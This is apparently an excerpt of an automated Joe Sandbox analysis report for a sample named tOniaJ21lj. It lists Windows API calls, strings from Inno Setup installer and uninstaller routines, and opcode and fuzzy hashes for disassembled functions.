                                                                                      • Instruction Fuzzy Hash: 5751D3356042059FC710DF5AD681A9BF3E5FF98304B3582ABE814C73A5D6B8AD92874C
                                                                                      APIs
                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00474076
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: NtdllProc_Window
                                                                                      • String ID:
                                                                                      • API String ID: 4255912815-0
                                                                                      • Opcode ID: 25d2fed37fc004c0ef9d7e1e532679906a7dfcc26d9c4c4e0f977566c6f286e0
                                                                                      • Instruction ID: 893271b3bcd24fcb62a5a78660203d6d155b33e0871f9808868e069105ad9bad
                                                                                      • Opcode Fuzzy Hash: 25d2fed37fc004c0ef9d7e1e532679906a7dfcc26d9c4c4e0f977566c6f286e0
                                                                                      • Instruction Fuzzy Hash: E8415779A04144DFCB10CF99C2808AAB7F9EB88311B25C592E94CDB745D339EE41EB98
                                                                                      APIs
                                                                                      • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045B923
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptFour
                                                                                      • String ID:
                                                                                      • API String ID: 2153018856-0
                                                                                      • Opcode ID: 2fd5046d53dc597d3e4d98d458f148574003c2ec4f4f0757a2eee833ca150b3b
                                                                                      • Instruction ID: 2225761bf594105b04891f9a979b45a9a4731abcd3a6ed3030aefe2a2354edc5
                                                                                      • Opcode Fuzzy Hash: 2fd5046d53dc597d3e4d98d458f148574003c2ec4f4f0757a2eee833ca150b3b
                                                                                      • Instruction Fuzzy Hash: C7C09BF601420CBF65005795ECC9CB7F75CE6586647408126F6044210195716C108674
                                                                                      APIs
                                                                                      • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046994F), ref: 0045B936
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptFour
                                                                                      • String ID:
                                                                                      • API String ID: 2153018856-0
                                                                                      • Opcode ID: c27a93e1bdfdde7edc9fcc879cc72405f18f208b3af26568a1f388ef4ce3250e
                                                                                      • Instruction ID: 96b9a57d22d70392ad1d1cde2f2ee6f5b4e57433d8ae25836dc8224d98b85447
                                                                                      • Opcode Fuzzy Hash: c27a93e1bdfdde7edc9fcc879cc72405f18f208b3af26568a1f388ef4ce3250e
                                                                                      • Instruction Fuzzy Hash: A7A002B0A94300BAFD2157605D0EF67262C97D0F15F2084657201A91D085A46400C63C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3270198232.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3270179742.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000001.00000002.3270219448.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_10000000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                      • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                      • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                      • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3270198232.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3270179742.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000001.00000002.3270219448.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_10000000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                      • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                      • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00494AA4,00000001,00000000,00000000,004568ED,?,?,?,00000001,?,00456B07,00000000,00456B1D,?,00000000,00496628), ref: 00456605
                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00494AA4,00000004,00000000,00002018,00000000), ref: 0045663D
                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,004568C3,?,00494AA4,00000001,00000000,00000000,004568ED,?,?,?), ref: 00456664
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456771
                                                                                      • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,004568C3,?,00494AA4,00000001,00000000,00000000,004568ED), ref: 004566C9
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      • CloseHandle.KERNEL32(00456B07,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456788
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00456B07,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004567C1
                                                                                      • GetLastError.KERNEL32(00000000,000000FF,00456B07,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004567D3
                                                                                      • UnmapViewOfFile.KERNEL32(00000000,004568CA,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004568A5
                                                                                      • CloseHandle.KERNEL32(00000000,004568CA,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004568B4
                                                                                      • CloseHandle.KERNEL32(00000000,004568CA,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004568BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                      • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                      • API String ID: 4012871263-351310198
                                                                                      • Opcode ID: 2d7d41f1dc95c0e97e8351de386188b607b902f05f624e0ced809bd65a677759
                                                                                      • Instruction ID: 980461e75233d27168dbefb0458f3d7e1823a55311cdbdb2a0391f25a35d7111
                                                                                      • Opcode Fuzzy Hash: 2d7d41f1dc95c0e97e8351de386188b607b902f05f624e0ced809bd65a677759
                                                                                      • Instruction Fuzzy Hash: 32918170E002159FDB10EBA9C845B9EB7B4EF48305F91856BF914EB382DB789908CF59
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                                      • SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                                      • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                                      • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                                      • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                                      • FreeLibrary.KERNEL32(00000001,?,00418F60,00000000,?,?,?,00000001), ref: 0041F1DF
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                      • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                      • API String ID: 2323315520-3614243559
                                                                                      • Opcode ID: 3ee75083f87a6e9960b975f8ce9b4bab73ebc8e6f4ff35a6c1ea5a687f8926a0
                                                                                      • Instruction ID: da08133687b7634b50b6c6a847516dd753fa1eb4508864759417a9d87976edef
                                                                                      • Opcode Fuzzy Hash: 3ee75083f87a6e9960b975f8ce9b4bab73ebc8e6f4ff35a6c1ea5a687f8926a0
                                                                                      • Instruction Fuzzy Hash: 3531F0B1640740EBDB00EBF5EC86E653654F768B28756093BB608DB162D77D488ACB1C
                                                                                      Strings
                                                                                      • Will restart because UninstallNeedRestart returned True., xrefs: 00491D80
                                                                                      • InitializeUninstall, xrefs: 00491BF0
                                                                                      • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 00491AAB
                                                                                      • Need to restart Windows? %s, xrefs: 00491DD1
                                                                                      • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 00491A36
                                                                                      • utCompiledCode[1] is invalid, xrefs: 00491A71
                                                                                      • Removed all? %s, xrefs: 00491CFA
                                                                                      • Setup version: Inno Setup version 5.3.5 (a), xrefs: 00491898
                                                                                      • InitializeUninstall returned False; aborting., xrefs: 00491C28
                                                                                      • Uninstall, xrefs: 0049184B
                                                                                      • Uninstall command line: , xrefs: 004918E8
                                                                                      • UninstallNeedRestart, xrefs: 00491D30, 00491D69
                                                                                      • Will not restart Windows automatically., xrefs: 00491EA4
                                                                                      • Uninstall DAT: , xrefs: 004918C5
                                                                                      • Original Uninstall EXE: , xrefs: 004918A2
                                                                                      • DeinitializeUninstall, xrefs: 00491F3A
                                                                                      • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 00491DAF
                                                                                      Similarity
                                                                                      • API ID: Window$Long$Show
                                                                                      • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 5.3.5 (a)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.$utCompiledCode[1] is invalid
                                                                                      • API String ID: 3609083571-1972832509
                                                                                      • Opcode ID: 564fb5d3747994d23ef970b5a2b0d3f85f6acd01b6bbcc9d08c4d2da2b19c3a8
                                                                                      • Instruction ID: 6596ef0c965ed04d70404abd425b2fb86aee653cd75455762a8c83b1d9d07689
                                                                                      • Opcode Fuzzy Hash: 564fb5d3747994d23ef970b5a2b0d3f85f6acd01b6bbcc9d08c4d2da2b19c3a8
                                                                                      • Instruction Fuzzy Hash: CE12AC34A54245AFDF11EB65EC42B9E7FA5AB19308F10807BF800A73B2CB789845CB5D
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,0041A8B4,?), ref: 0041C9B0
                                                                                      • 73A14C40.GDI32(?,00000000,?,0041A8B4,?), ref: 0041C9BC
                                                                                      • 73A16180.GDI32(0041A8B4,?,00000001,00000001,00000000,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9E0
                                                                                      • 73A14C00.GDI32(?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9F0
                                                                                      • SelectObject.GDI32(0041CDAC,00000000), ref: 0041CA0B
                                                                                      • FillRect.USER32(0041CDAC,?,?), ref: 0041CA46
                                                                                      • SetTextColor.GDI32(0041CDAC,00000000), ref: 0041CA5B
                                                                                      • SetBkColor.GDI32(0041CDAC,00000000), ref: 0041CA72
                                                                                      • PatBlt.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00FF0062), ref: 0041CA88
                                                                                      • 73A14C40.GDI32(?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4), ref: 0041CA9B
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CACC
                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4), ref: 0041CAE4
                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?), ref: 0041CAED
                                                                                      • 73A08830.GDI32(0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CAFC
                                                                                      • 73A022A0.GDI32(0041CDAC,0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CB05
                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CB1E
                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CB35
                                                                                      • 73A14D40.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB7A,?,?,00000000), ref: 0041CB51
                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CB5E
                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CB74
                                                                                        • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                                      Similarity
                                                                                      • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                      • String ID:
                                                                                      • API String ID: 2377543522-0
                                                                                      • Opcode ID: d7b92da64cecfd48f0a2b1e7f5bec81e0b40094dab39069241f93e3b0f0d639f
                                                                                      • Instruction ID: 7128b10ae0d2f5501f58bad1f60f679124a592cf14607d549707b49f1954e982
                                                                                      • Opcode Fuzzy Hash: d7b92da64cecfd48f0a2b1e7f5bec81e0b40094dab39069241f93e3b0f0d639f
                                                                                      • Instruction Fuzzy Hash: 5961FC71A44609ABDF10EBE5DC86FAFB7B8EF48704F10446AF504E7281C67CA9418B69
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(00494788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DEF6
                                                                                      • GetVersion.KERNEL32(00000000,0042E0A0,?,00494788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF13
                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E0A0,?,00494788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF2C
                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DF32
                                                                                      • FreeSid.ADVAPI32(00000000,0042E0A7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E09A
                                                                                      Similarity
                                                                                      • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                      • API String ID: 1717332306-1888249752
                                                                                      • Opcode ID: 59bbf30f185a9ae2ec61c265cb76b637c59ffee8dc596189c0408cef68f3f34f
                                                                                      • Instruction ID: 5045d4bdae095839e21654112f0de3b8f2816e6eca6f617d5415efb28b53f152
                                                                                      • Opcode Fuzzy Hash: 59bbf30f185a9ae2ec61c265cb76b637c59ffee8dc596189c0408cef68f3f34f
                                                                                      • Instruction Fuzzy Hash: 6151C571B44629AEDB10EAE69C42F7F77ECEB09304F94447BB500F7282C5BC9806866D
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,00000005,00000000,00492E24,?,?,00000000,?,00000000,00000000,?,00493165,00000000,0049316F,?,00000000), ref: 00492B0F
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492E24,?,?,00000000,?,00000000,00000000,?,00493165,00000000), ref: 00492B22
                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492E24,?,?,00000000,?,00000000,00000000), ref: 00492B32
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00492B53
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492E24,?,?,00000000,?,00000000), ref: 00492B63
                                                                                        • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00492520,00000000,004926E9,?,?,00000005), ref: 0042D35D
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$e1I$o1I
                                                                                      • API String ID: 2000705611-221793176
                                                                                      • Opcode ID: 93f4319d652df31d1491f7e58c9920bd5a7ef255fec07566d47bc37a90253f49
                                                                                      • Instruction ID: 4be49199d801b1cb5a3f4bb92d7f292d3e3738ea6ecad4381c70a4705d363757
                                                                                      • Opcode Fuzzy Hash: 93f4319d652df31d1491f7e58c9920bd5a7ef255fec07566d47bc37a90253f49
                                                                                      • Instruction Fuzzy Hash: 3891D434A04205AFDF11EBA5D956BAF7FB4EB09304F918477F400AB692C6BD9C05CB19
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,0045907E,?,?,?,?,?,00000006,?,00000000,00491FBA,?,00000000,0049205D), ref: 00458F30
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                      • API String ID: 1452528299-1593206319
                                                                                      • Opcode ID: 5d7b9d7c30f83f3247b130719882f36e307d81f231b67c3dd7c11efa3abf157e
                                                                                      • Instruction ID: e4eb3b4405a0979e1a2c77286c885a36d1837fd04eb9654633cb4fd66a7308d3
                                                                                      • Opcode Fuzzy Hash: 5d7b9d7c30f83f3247b130719882f36e307d81f231b67c3dd7c11efa3abf157e
                                                                                      • Instruction Fuzzy Hash: 7B618E30B042549BDB10EB69C8827AE77A9AB48715F50486FF801EB383CB789D49C799
                                                                                      APIs
                                                                                      • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B333
                                                                                      • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B33D
                                                                                      • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B34F
                                                                                      • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B366
                                                                                      • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B372
                                                                                      • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B39F
                                                                                      • 73A0A480.USER32(00000000,00000000,0041B3D2,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                                      • DeleteDC.GDI32(?), ref: 0041B449
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                      • String ID:
                                                                                      • API String ID: 3135053572-0
                                                                                      • Opcode ID: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                                      • Instruction ID: ef99a8f9a6f00624a9096b2aeeb37702e3b70ceb3a8cbf3cb68c8f3869cb2bd7
                                                                                      • Opcode Fuzzy Hash: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                                      • Instruction Fuzzy Hash: 1541D071E40619AFDF10DAE9D846FEFB7BCEF08704F104466B614FB281C67869408BA4
                                                                                      APIs
                                                                                        • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046EA4F
                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EB46
                                                                                      • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0046EB5C
                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                      • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                      • API String ID: 971782779-3668018701
                                                                                      • Opcode ID: f899328f81346ceb28187c7e053454cefd689a42d0f673cda6a499a0fcfe0b0b
                                                                                      • Instruction ID: 9b3c0a2ebe02865d096d3d92589461d85e8d30d772736a84054ea4ba39fb763a
                                                                                      • Opcode Fuzzy Hash: f899328f81346ceb28187c7e053454cefd689a42d0f673cda6a499a0fcfe0b0b
                                                                                      • Instruction Fuzzy Hash: FBD12274A00249AFDB01DF95D885FDEBBF5AF08314F54402AF900B7392D678AE45CB69
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegQueryValueExA.ADVAPI32(00459246,00000000,00000000,?,00000000,?,00000000,004535D1,?,00459246,00000003,00000000,00000000,00453608), ref: 00453451
                                                                                        • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451E7B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                                      • RegQueryValueExA.ADVAPI32(00459246,00000000,00000000,00000000,?,00000004,00000000,0045351B,?,00459246,00000000,00000000,?,00000000,?,00000000), ref: 004534D5
                                                                                      • RegQueryValueExA.ADVAPI32(00459246,00000000,00000000,00000000,?,00000004,00000000,0045351B,?,00459246,00000000,00000000,?,00000000,?,00000000), ref: 00453504
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004533A8
                                                                                      • , xrefs: 004533C2
                                                                                      • RegOpenKeyEx, xrefs: 004533D4
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045336F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$FormatMessageOpen
                                                                                      • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                      • API String ID: 2812809588-1577016196
